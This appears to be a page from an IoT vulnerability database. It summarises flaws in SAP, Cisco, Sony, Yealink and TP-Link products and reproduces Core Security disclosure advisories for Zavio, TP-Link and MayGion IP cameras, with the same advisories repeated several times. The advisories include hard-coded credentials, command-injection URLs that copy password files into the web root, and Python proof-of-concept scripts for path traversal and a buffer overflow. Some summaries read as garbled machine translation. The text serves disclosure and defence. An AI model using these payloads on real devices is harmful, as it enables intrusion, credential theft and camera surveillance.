VARIoT IoT vulnerabilities database

SAP NetWeaver Gateway allows developers to openly access SAP software in any environment or any terminal for solution development. Because SAP NetWeaver Gateway does not properly limit arbitrary RFC requests, remote attackers are allowed to exploit vulnerabilities to enumerate legitimate SAP client numbers, which range from 000 to 999 and can be enumerated through brute force attacks

The PlayStation 3 is a home game console developed by Sony Computer Entertainment. A security vulnerability exists in PlayStation3 that allows a local attacker to exploit a vulnerability to build a specially crafted SFO file and execute any system commands while saving.

SAP NetWeaver Gateway allows developers to openly access SAP software in any environment or any terminal for solution development. The locking mechanism used by SAP NetWeaver Gateway to protect against brute force attacks is vulnerable. Because the default account lock threshold reset is predictable at 00:01, the remote attacker is allowed to perform brute force attacks between the end of work and midnight, so that the attack will not be attacked. Discover it right away

SAP NetWeaver Gateway allows developers to openly access SAP software in any environment or any terminal for solution development. The RFC_ABAP_INSTALL_AND_RUN RFC provided by SAP NetWeaver Gateway has a security vulnerability. This RFC is used to execute the ABAP source line code, allowing authenticated remote attackers to execute arbitrary commands using the RFC

Cisco TelePresence System Software does not properly handle inactive t-shell sessions, which allows remote authenticated users to cause a denial of service (memory consumption and service outage) by establishing multiple SSH connections, aka Bug ID CSCug77610. Cisco TelePresence System is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCug77610. Cisco TelePresence is a set of video conferencing solutions called "TelePresence" system of Cisco (Cisco). The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect

The encryption functionality in Cisco NX-OS on the Nexus 1000V does not properly handle Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication, which allows remote attackers to intercept or modify network traffic by leveraging certain Layer 2 or Layer 3 access, aka Bug ID CSCud14691. Vendors have confirmed this vulnerability Bug ID CSCud14691 It is released as.Network traffic may be intercepted or altered by third parties using access rights to Layer 2 or Layer 3. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Successful exploits will allow attackers to perform unauthorized actions and obtain sensitive information that may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14691

Array index error in the Virtual Ethernet Module (VEM) kernel driver for VMware ESXi in Cisco NX-OS on the Nexus 1000V, when STUN debugging is enabled, allows remote attackers to cause a denial of service (ESXi crash and purple screen of death) by sending crafted STUN packets to a VEM, aka Bug ID CSCud14825. (ESXi Crash and purple screen (purple screen of death)) There are vulnerabilities that are put into a state. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Sending a specially crafted STUN message to the VEM crashes the ESXi Hypervisor. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCud14825

Cisco NX-OS on the Nexus 1000V does not properly handle authentication for Virtual Ethernet Module (VEM) to Virtual Supervisor Module (VSM) communication, which allows remote attackers to obtain VEM access via (1) spoofed STUN packets or (2) a crafted VMware ESXi instance, aka Bug ID CSCud14832. Vendors have confirmed this vulnerability Bug ID CSCud14832 It is released as.By a third party (1) Camouflaged STUN Packet, or (2) Cleverly crafted VMware ESXi Through the instance VEM May be accessed. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. Remote attackers can exploit this issue to bypass authentication mechanism and gain unauthorized access to an affected device. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14832. http://drupal.org/node/207891

The SSL functionality in Cisco NX-OS on the Nexus 1000V does not properly verify X.509 certificates, which allows man-in-the-middle attackers to spoof servers, and intercept or modify Virtual Supervisor Module (VSM) to VMware vCenter communication, via a crafted certificate, aka Bug ID CSCud14837. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. An attacker can exploit this issue to perform man-in-the-middle attacks and perform certain unauthorized actions, which will aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14837. Cisco NX-OS is the American Cisco ( Cisco ) The company's set of operating systems for data centers

Cisco NX-OS on the Nexus 1000V does not assign the proper priority to heartbeat messages from a Virtual Ethernet Module (VEM) to a Virtual Supervisor Module (VSM), which allows remote attackers to cause a denial of service (false VEM unavailability report) via a flood of UDP packets, aka Bug ID CSCud14840. Vendors have confirmed this vulnerability Bug ID CSCud14840 It is released as.A large amount by a third party UDP Service disruption via packets (VEM False reports of non-operational status ) There is a possibility of being put into a state. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The delivery could not be successful, causing the VSM to report that the affected VEM is unavailable and causing a denial of service attack. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCud14840

The YeaLink IP Phone SIP-T20P/SIP-T26P phone device with firmware version <=9.70.0.100 has a security vulnerability that allows an attacker to use the first available SIP account, call without user confirmation, and the caller can also pass the microphone. monitor. YeaLink IP Phone SIP-T20P and SIP-T26P are both enterprise-grade IP phones from YeaLink of China. SIP-T20P is characterized by easy installation and use, convenient management, and improved office efficiency. It is mainly used for SMEs, call centers, governments and industry users. The feature of SIP-T26P is that it supports VLAN and OPen VPN functions, which is suitable for professional users such as supervisors, front desks, dispatchers, and agents. A security bypass vulnerability exists in YeaLink IP Phone SIP-T20P and SIP-T26P. An attacker could use this vulnerability to bypass specific security restrictions and perform unauthorized operations

TP-LINK TL-WR842ND is a wireless router product of China TP-LINK company. A directory traversal vulnerability exists in TP-LINK TL-WR842ND. A remote attacker could use this vulnerability to gain sensitive information that can help launch further attacks. TP-LINK TL-WR842ND There are vulnerabilities in version 3.12.22 Build 120424 Rel.39632n running firmware, other versions may also be affected. TP-LINK TL-WR842ND is prone to a directory-traversal vulnerability

A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 in the General.Time.NTP.Server parameter to the sub_C8C8 function of the binary /opt/cgi/view/param, which could let a remove malicious user execute arbitrary code. Zavio IP The camera has OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Zavio IP Cameras are prone to a command-injection vulnerability. Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable. *Advisory Information* Title: Zavio IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0302 Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: Zavio Release mode: User release 2. *Vulnerability Information* Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570 3. *Vulnerability Description* Multiple vulnerabilities have been found in Zavio IP cameras based on firmware v1.6.03 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials. 2. This flaw can also be used to obtain all credentials of registered users. 3. [CVE-2013-2569] to access the camera video stream. 4. 4. *Vulnerable Packages* . 5. *Non-Vulnerable Packages* . Vendor did not provide details. Contact Zavio for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to Internet unless absolutely necessary. Enable RTSP authentication. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'. Check the parameter 'General.Time.NTP.Server' in requests to '/opt/cgi/view/param'. 7. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567] Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 'wireless_mft.cgi' The last file contains the OS command injection showed in the following section. 8.2. *OS Command Injection* [CVE-2013-2568] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569] The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting: /----- rtsp://192.168.1.100/video.h264 -----/ 8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570] The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept can be used to obtain the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey': /----- http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off -----/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. 2013-05-09: Core asks for a reply. 2013-05-14: Core asks for a reply. 2013-05-21: Core tries to contact vendor for last time without any reply. 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A Command Injection vulnerability exists in the ap parameter to the /cgi-bin/mft/wireless_mft.cgi file in TP-Link IP Cameras TL-SC 3130, TL-SC 3130G, 3171G. and 4171G 1.6.18P12s, which could let a malicious user execute arbitrary code. plural TP-Link IP Camera Products include OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. TP-LINK IP Cameras are network camera products. A remote attacker can bypass the authentication by using a hard-coded username and password for the affected product (see CVE-2013-2572), and then use this command to inject the vulnerability to execute arbitrary commands from the administrator's web interface. *Advisory Information* Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: TP-Link Release mode: Coordinated release 2. *Vulnerability Description* Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker: 1. [CVE-2013-2572] to bypass user web interface authentication using hard-coded credentials. 2. This flaw can also be used to obtain all credentials of registered users. 4. *Vulnerable Packages* . Tests and PoC were run on: . TL-SC 3130 [CVE-2013-2572] works with this device only . TL-SC 3130G . TL-SC 3171G . 5. *Vendor Information, Solutions and Workarounds* Vendor provides the links to patched firmware versions. This software is *beta*, TP-Link will release the final versions with release notes and some new functions and fixes in the following days. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2572] TP-Link IP cameras use the Boa web server [1], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 7.2. *OS Command Injection in wireless_mft.cgi* [CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8. *Report Timeline* . 2013-04-29: Core Security Technologies notifies the TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013. 2013-04-30: TP-Link team asks for a report with technical information. 2013-05-02: Technical details sent to TP-Link. 2013-05-12: Vendor notifies that a new firmware will be released around May 20th. 2013-05-16: Core asks vendor if they are ready for coordinated public disclosure on May 20th. 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th. 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th. 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm if issues were fixed. 2013-05-27: Vendor notifies that consumers are able to download the Beta firmware from TP-Link website. The final release will be made public in the following days, and will increase some new functions. 2013-05-28: Advisory CORE-2013-0318 published. 9. *References* [1] http://www.boa.org/. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 via the ap parameter to /cgi-bin/mft/wireless_mft.cgi, which could let a remote malicious user execute arbitrary code. Zavio IP The camera has OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Zavio is an IP camera. This vulnerability can also be used to obtain credentials for all registered users. Zavio IP Cameras are prone to a remote arbitrary command-injection vulnerability. Successful exploits will allow attackers to execute arbitrary commands in the context of the affected application. This may further aid in other attacks. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable. *Advisory Information* Title: Zavio IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0302 Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: Zavio Release mode: User release 2. *Vulnerability Information* Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570 3. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials. 2. 3. [CVE-2013-2569] to access the camera video stream. 4. 4. *Vulnerable Packages* . 5. *Non-Vulnerable Packages* . Vendor did not provide details. Contact Zavio for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to Internet unless absolutely necessary. Enable RTSP authentication. Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'. Check the parameter 'General.Time.NTP.Server' in requests to '/opt/cgi/view/param'. 7. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567] Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside: /----- # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam -----/ This account is not visible from the user web interface; users are not aware of the existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/': 1. 'manufacture.cgi' 2. 'wireless_mft.cgi' The last file contains the OS command injection showed in the following section. 8.2. *OS Command Injection* [CVE-2013-2568] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials showed in the previous section: /----- username: manufacture password: erutcafunam -----/ The following proof of concept copies the file where the user credentials are stored in the web server root directory: /----- http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales -----/ Afterwards, the user credentials can be obtained by requesting: /----- http://192.168.1.100/credenciales -----/ 8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569] The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting: /----- rtsp://192.168.1.100/video.h264 -----/ 8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570] The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept can be used to obtain the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey': /----- http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off -----/ 9. *Report Timeline* . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received. 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report. 2013-05-09: Core asks for a reply. 2013-05-14: Core asks for a reply. 2013-05-21: Core tries to contact vendor for last time without any reply. 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'. 10. *References* [1] http://www.zavio.com/product.php?id=25. [2] http://zavio.com/product.php?id=23. [3] http://www.boa.org/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The encryption functionality in the Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication component in Cisco NX-OS on the Nexus 1000V does not properly authenticate VSM/VEM packets, which allows remote attackers to disable packet-level encryption and integrity protection via crafted packets, aka Bug ID CSCud14710. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. And integrity protection. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions on the affected device. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCud14710. The vulnerability is caused by the program not properly validating VSM/VEM packets

Directory traversal vulnerability in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to read arbitrary files via a .. (dot dot) in the default URI. MayGion IP Camera is prone to a directory-traversal vulnerability. An attacker can exploit this issue using directory-traversal strings to retrieve arbitrary files outside of the server root directory. This may aid in further attacks. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MayGion IP Cameras multiple vulnerabilities 1. *Advisory Information* Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: MayGion Release mode: Coordinated release 2. *Vulnerability Information* Class: Path traversal [CWE-22], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1604, CVE-2013-1605 3. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials, 2. [CVE-2013-1605] to execute arbitrary code. 4. *Vulnerable Packages* . Other firmware versions are probably affected too but they were not checked. 5. *Non-Vulnerable Packages* . H.264 ipcam firmware 2013.04.22. 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. 7. *Technical Description / Proof of Concept Code* 7.1. *User Credentials Leaked via Path Traversal* [CVE-2013-1604] The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker. /----- import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/../../../../../../../../../proc/kcore") resp = conn.getresponse() data = resp.read() conn.close() -----/ 7.2. *Buffer overflow* [CVE-2013-1605] The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition. /----- import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/" + "A" * 3000 + ".html") resp = conn.getresponse() data = resp.read() conn.close() -----/ 8. *Report Timeline* . 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013. 2013-05-02: Vendor asks for a report with technical information. 2013-05-03: A draft advisory containing technical details sent to MayGion team. 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the last firmware version, released April 22nd, 2013. 2013-05-09: Core asks for a list of affected devices and firmware. No reply received. 2013-05-28: Advisory CORE-2013-0322 is published. 9. *References* [1] http://www.maygion.com 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Buffer overflow in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to execute arbitrary code via a long filename in a GET request. MayGion IP Camera is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MayGion IP Cameras multiple vulnerabilities 1. *Advisory Information* Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: MayGion Release mode: Coordinated release 2. *Vulnerability Information* Class: Path traversal [CWE-22], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1604, CVE-2013-1605 3. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials, 2. 4. *Vulnerable Packages* . MayGion IP cameras based on firmware 2011.27.09. Other firmware versions are probably affected too but they were not checked. 5. *Non-Vulnerable Packages* . H.264 ipcam firmware 2013.04.22. 6. *Credits* These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. 7. *Technical Description / Proof of Concept Code* 7.1. *User Credentials Leaked via Path Traversal* [CVE-2013-1604] The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker. /----- import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/../../../../../../../../../proc/kcore") resp = conn.getresponse() data = resp.read() conn.close() -----/ 7.2. *Buffer overflow* [CVE-2013-1605] The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition. /----- import httplib conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/" + "A" * 3000 + ".html") resp = conn.getresponse() data = resp.read() conn.close() -----/ 8. *Report Timeline* . 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013. 2013-05-02: Vendor asks for a report with technical information. 2013-05-03: A draft advisory containing technical details sent to MayGion team. 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the last firmware version, released April 22nd, 2013. 2013-05-09: Core asks for a list of affected devices and firmware. No reply received. 2013-05-28: Advisory CORE-2013-0322 is published. 9. *References* [1] http://www.maygion.com 10. *About 